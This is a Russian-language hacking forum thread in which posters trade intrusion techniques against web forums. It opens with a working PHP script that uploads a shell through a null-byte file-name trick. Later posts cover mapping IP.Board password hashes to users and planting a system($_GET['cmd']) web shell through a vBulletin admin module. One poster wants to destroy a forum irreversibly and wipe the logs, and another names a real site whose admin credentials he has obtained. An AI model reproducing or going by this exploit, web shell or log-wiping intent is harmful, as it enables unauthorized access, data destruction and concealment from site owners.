Пробовал на CentOS, php5 - не работает, нуллбайт игнорируется и расширение .gif приписывается при MagicQuotes on и off На винде работает при MagicQuotes Off PHP: <?php $sh = '<?php phpinfo();?>'; $conte = "--ololo\r\n"; $conte .= 'Content-Disposition: form-data; name="myname"' . "\r\n\r\n"; $conte .= 'shell.php' . "\x00" . "\r\n"; $conte .= "--ololo\r\n"; $conte .= 'Content-Disposition: form-data; name="picture"; filename="picture.jpg"' . "\r\n"; $conte .= "Content-Type: image/jpeg\r\n\r\n"; $conte .= $sh . "\r\n"; $conte .= "--ololo--\r\n"; post('http://host/script.php', $conte); function post($url, $cont){ $url = parse_url($url); $respons=""; $postsock = fsockopen($url['host'], 80, $errno, $errstr, 60); $head = "POST {$url['path']} HTTP/1.1\r\n"; $head .= "Host: {$url['host']}\r\n"; $head .= "Connection: close\r\n"; $head .= "Content-Length: " .strlen($cont). "\r\n"; $head .= "Content-Type: multipart/form-data; boundary=ololo\r\n\r\n"; $head .= $cont . "\r\n"; fwrite($postsock, $head); while(!feof($postsock)){ $respons .= fgets($postsock, 1024); } fclose($postsock); return $respons; } ?>
Вопрос есть доступ к базе ipb Table: ibf_members_converge Columns: converge_email converge_joined converge_pass_hash converge_pass_salt как мне сопоставить хеши к иду или юзернейму?куда еще рыть? в копирайтах вижу это Powered By IP.Board © 2010 IPS, Inc. спасибо за ответы
шелл для булки-4 Привет! вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось. Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]); И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда((( Подскажите, что делаю ни так? Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче. что посоветуете? заранее спасибо за помощь
А комманд лайн - это что за команды? Через них форр повесить можно?) Т.е sql никак не покатит? я проста хотел сделать drop таблицы со всеми настройками, ну а потом и с логами))
вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина! могу скинуть линк в пм!
админок может быть сколько угодно, поищу другую админку. может таблица была ЮЗЕРОВ, а не АДМИНОВ? попробуй эти пассы к FTP, SSH...
еще раз предупреждаю всех, без всяких ников. не дайте глупые советы которые только заблуждают пользователей, и не суйтесь в тему если вы в этом не разбираетесь. буду следить строго,и в следуюший раз если увижу такое то будете отвечать за такое "бредо-сообщение".
Привет. Есть сайт http://www.pacificsun.com/, в нем таблица user, там мыло и пасс в тексте, всего 5 записей, в том числе webmaster@... , так что походу таблица касается админов. Пробовал найти админку - ничего не нашлось, только стандартная форма логина для обычных юзеров, куда не подходят данные. Подскажите, пожалуйста, куда таки надо вводить пароли?
Нашел команды юникса, комманд лайн этот, пишу короче: www.xz.сom/forumpath/faq.php?cmd=rm css.php (чтобы удалить файл css.php) И нифига. Выводится страница поиска по справке. В ВБ 4.0 это пофиксили чтоли? Через систему модулей добавлен модуль такого содержания: system($_GET["cmd"]);
а ты смотрел права есть на удаление? или думаешь что сразу рута получил?...почитайте перед тем как постить бред сивой кобылы.. П.С. Радует одно что скоро всем вам в школу и прекратится бред и всякая чушь на ачате, хотя бы частично.
сначала проверь работает вообще коммандная строка или нет, потом командой ls -al смотри свои права на файлы =\
